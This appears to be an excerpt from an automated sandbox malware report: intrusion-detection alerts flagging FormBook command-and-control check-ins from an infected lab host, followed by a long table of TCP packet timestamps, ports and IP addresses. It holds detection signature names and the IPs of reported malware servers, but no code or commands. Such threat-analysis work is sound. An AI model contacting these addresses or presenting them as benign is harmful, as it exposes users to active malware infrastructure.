2024-08-13T06:43:24.533484+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49718	80	192.168.2.5	208.91.197.27
2024-08-13T06:44:18.151077+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49731	80	192.168.2.5	23.251.54.212
2024-08-13T06:41:56.947367+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49752	80	192.168.2.5	172.67.210.102
2024-08-13T06:43:49.962108+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49723	80	192.168.2.5	43.252.167.188
2024-08-13T06:42:54.860572+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49713	80	192.168.2.5	217.160.0.106
2024-08-13T06:42:52.310484+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49712	80	192.168.2.5	217.160.0.106
2024-08-13T06:45:43.869377+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49750	80	192.168.2.5	172.67.210.102
2024-08-13T06:44:48.742452+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49734	80	192.168.2.5	199.192.19.19
2024-08-13T06:45:07.934243+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49740	80	192.168.2.5	213.145.228.16
2024-08-13T06:44:40.560837+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49732	80	192.168.2.5	23.251.54.212
2024-08-13T06:45:18.734659+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49743	80	192.168.2.5	91.195.240.19
2024-08-13T06:44:03.377096+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49727	80	192.168.2.5	194.9.94.85

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 13, 2024 06:42:35.819205046 CEST	49711	80	192.168.2.5	5.44.111.162
Aug 13, 2024 06:42:35.824295998 CEST	80	49711	5.44.111.162	192.168.2.5
Aug 13, 2024 06:42:35.824493885 CEST	49711	80	192.168.2.5	5.44.111.162
Aug 13, 2024 06:42:35.832775116 CEST	49711	80	192.168.2.5	5.44.111.162
Aug 13, 2024 06:42:35.837985039 CEST	80	49711	5.44.111.162	192.168.2.5
Aug 13, 2024 06:42:36.497150898 CEST	80	49711	5.44.111.162	192.168.2.5
Aug 13, 2024 06:42:36.497210979 CEST	80	49711	5.44.111.162	192.168.2.5
Aug 13, 2024 06:42:36.497566938 CEST	49711	80	192.168.2.5	5.44.111.162
Aug 13, 2024 06:42:36.501715899 CEST	49711	80	192.168.2.5	5.44.111.162
Aug 13, 2024 06:42:36.506623983 CEST	80	49711	5.44.111.162	192.168.2.5
Aug 13, 2024 06:42:51.652630091 CEST	49712	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:51.657686949 CEST	80	49712	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:51.657810926 CEST	49712	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:51.660427094 CEST	49712	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:51.665275097 CEST	80	49712	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:52.310221910 CEST	80	49712	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:52.310415983 CEST	80	49712	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:52.310483932 CEST	49712	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:53.181334019 CEST	49712	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:54.185702085 CEST	49713	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:54.190781116 CEST	80	49713	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:54.190886974 CEST	49713	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:54.192411900 CEST	49713	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:54.197304010 CEST	80	49713	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:54.860408068 CEST	80	49713	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:54.860501051 CEST	80	49713	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:54.860572100 CEST	49713	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:55.697583914 CEST	49713	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:56.715428114 CEST	49715	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:56.720803022 CEST	80	49715	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:56.720900059 CEST	49715	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:56.722495079 CEST	49715	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:56.727768898 CEST	80	49715	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:56.727778912 CEST	80	49715	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:57.360588074 CEST	80	49715	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:57.360622883 CEST	80	49715	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:57.360686064 CEST	49715	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:58.228899956 CEST	49715	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.247752905 CEST	49716	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.254354000 CEST	80	49716	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:59.254467010 CEST	49716	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.256431103 CEST	49716	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.263367891 CEST	80	49716	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:59.895911932 CEST	80	49716	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:59.896631002 CEST	80	49716	217.160.0.106	192.168.2.5
Aug 13, 2024 06:42:59.896734953 CEST	49716	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.898962021 CEST	49716	80	192.168.2.5	217.160.0.106
Aug 13, 2024 06:42:59.903856993 CEST	80	49716	217.160.0.106	192.168.2.5
Aug 13, 2024 06:43:21.542144060 CEST	49717	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:21.547101974 CEST	80	49717	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:21.547197104 CEST	49717	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:21.549137115 CEST	49717	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:21.554474115 CEST	80	49717	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:22.027937889 CEST	80	49717	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:22.028285027 CEST	49717	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:23.056865931 CEST	49717	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:23.061896086 CEST	80	49717	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:24.076652050 CEST	49718	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:24.081789970 CEST	80	49718	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:24.082019091 CEST	49718	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:24.084594011 CEST	49718	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:24.089447975 CEST	80	49718	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:24.533390999 CEST	80	49718	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:24.533483982 CEST	49718	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:25.588100910 CEST	49718	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:25.595829010 CEST	80	49718	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:26.606733084 CEST	49719	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:26.611892939 CEST	80	49719	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:26.612195015 CEST	49719	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:26.614162922 CEST	49719	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:26.619095087 CEST	80	49719	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:26.619163036 CEST	80	49719	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:27.071295023 CEST	80	49719	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:27.071472883 CEST	49719	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:28.119462013 CEST	49719	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:28.124516010 CEST	80	49719	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:29.138124943 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:29.143176079 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:29.143420935 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:29.145206928 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:29.150222063 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163675070 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163696051 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163708925 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163815975 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163825989 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163839102 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163849115 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.163851976 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163862944 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.163908005 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.163989067 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.164146900 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.171257019 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.171313047 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.171324968 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.171341896 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.171371937 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.171498060 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.213010073 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.250274897 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.250293016 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.250304937 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.250391006 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.250442982 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:30.250569105 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.252839088 CEST	49720	80	192.168.2.5	208.91.197.27
Aug 13, 2024 06:43:30.257671118 CEST	80	49720	208.91.197.27	192.168.2.5
Aug 13, 2024 06:43:44.022881985 CEST	49721	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:44.028043985 CEST	80	49721	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:44.030672073 CEST	49721	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:44.032542944 CEST	49721	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:44.038110971 CEST	80	49721	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:44.909596920 CEST	80	49721	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:44.909667015 CEST	80	49721	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:44.909838915 CEST	49721	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:45.541177034 CEST	49721	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:46.563107014 CEST	49722	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:46.574728966 CEST	80	49722	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:46.579219103 CEST	49722	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:46.582683086 CEST	49722	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:46.587591887 CEST	80	49722	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:47.444407940 CEST	80	49722	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:47.445544004 CEST	80	49722	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:47.445621967 CEST	49722	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:48.090442896 CEST	49722	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:49.106837988 CEST	49723	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:49.111975908 CEST	80	49723	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:49.112068892 CEST	49723	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:49.114031076 CEST	49723	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:49.119170904 CEST	80	49723	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:49.119185925 CEST	80	49723	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:49.961944103 CEST	80	49723	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:49.961985111 CEST	80	49723	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:49.962107897 CEST	49723	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:50.619338036 CEST	49723	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:51.647546053 CEST	49724	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:51.652601004 CEST	80	49724	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:51.652697086 CEST	49724	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:51.716262102 CEST	49724	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:51.721066952 CEST	80	49724	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:52.513009071 CEST	80	49724	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:52.513101101 CEST	80	49724	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:52.517461061 CEST	49724	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:52.517462015 CEST	49724	80	192.168.2.5	43.252.167.188
Aug 13, 2024 06:43:52.522392035 CEST	80	49724	43.252.167.188	192.168.2.5
Aug 13, 2024 06:43:57.630635977 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:57.635709047 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:57.635785103 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:57.637999058 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:57.647639990 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.535918951 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.535944939 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.535959959 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536014080 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536031008 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536047935 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536065102 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536134958 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:58.536237001 CEST	80	49725	194.9.94.85	192.168.2.5
Aug 13, 2024 06:43:58.536386967 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:58.536516905 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:43:59.150688887 CEST	49725	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.169617891 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.177206993 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.180573940 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.184510946 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.189560890 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865123034 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865175962 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865210056 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865225077 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.865245104 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865288019 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:00.865293026 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865330935 CEST	80	49726	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:00.865385056 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:01.697465897 CEST	49726	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:02.716896057 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:02.722018003 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:02.722702026 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:02.726593018 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:02.731448889 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:02.731662989 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.376930952 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377016068 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377053022 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377095938 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:03.377139091 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377188921 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377188921 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:03.377223969 CEST	80	49727	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:03.377279997 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:04.228750944 CEST	49727	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.247051001 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.253490925 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.253587961 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.255122900 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.260158062 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.919945002 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.919992924 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920039892 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920074940 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920116901 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.920135975 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920170069 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920170069 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.920207024 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:05.920238972 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.920795918 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.927124977 CEST	49728	80	192.168.2.5	194.9.94.85
Aug 13, 2024 06:44:05.932076931 CEST	80	49728	194.9.94.85	192.168.2.5
Aug 13, 2024 06:44:11.577828884 CEST	49729	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:11.582767010 CEST	80	49729	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:11.582839966 CEST	49729	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:11.585572958 CEST	49729	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:11.590497971 CEST	80	49729	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:13.088129044 CEST	49729	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:13.136744976 CEST	80	49729	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:14.106106997 CEST	49730	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:14.111325026 CEST	80	49730	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:14.112550974 CEST	49730	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:14.116482973 CEST	49730	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:14.121382952 CEST	80	49730	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:15.619420052 CEST	49730	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:15.668808937 CEST	80	49730	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:16.638874054 CEST	49731	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:16.643906116 CEST	80	49731	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:16.648508072 CEST	49731	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:16.648509026 CEST	49731	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:16.653395891 CEST	80	49731	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:16.653585911 CEST	80	49731	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:18.151077032 CEST	49731	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:18.196959972 CEST	80	49731	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:19.170928001 CEST	49732	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:19.176151037 CEST	80	49732	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:19.176228046 CEST	49732	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:19.178416967 CEST	49732	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:19.183319092 CEST	80	49732	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:32.984033108 CEST	80	49729	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:32.984112978 CEST	49729	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:35.482600927 CEST	80	49730	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:35.482672930 CEST	49730	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:38.028980017 CEST	80	49731	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:38.029251099 CEST	49731	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:40.560611010 CEST	80	49732	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:40.560837030 CEST	49732	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:40.561923027 CEST	49732	80	192.168.2.5	23.251.54.212
Aug 13, 2024 06:44:40.566792011 CEST	80	49732	23.251.54.212	192.168.2.5
Aug 13, 2024 06:44:45.604887962 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:45.610095024 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:45.610161066 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:45.611994028 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:45.616991043 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208030939 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208051920 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208069086 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208107948 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.208131075 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208147049 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208161116 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208312988 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.208434105 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208450079 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208465099 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208488941 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.208518028 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.208872080 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.213171959 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.213187933 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.213262081 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.213320971 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.213336945 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.213597059 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.300060987 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.300117016 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.300261021 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:46.300434113 CEST	80	49733	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:46.300540924 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:47.125814915 CEST	49733	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.137428999 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.147830963 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.147978067 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.151527882 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.156625986 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742109060 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742151976 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742167950 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742405891 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742422104 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742438078 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742451906 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.742455006 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742541075 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.742748976 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742801905 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742818117 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.742899895 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.747374058 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.747447968 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.747462988 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.747548103 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.828912973 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.828948975 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.829018116 CEST	80	49734	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:48.829050064 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:48.829128981 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:49.666182995 CEST	49734	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:50.684108019 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:50.689382076 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:50.689497948 CEST	49735	80	192.168.2.5	199.192.19.19
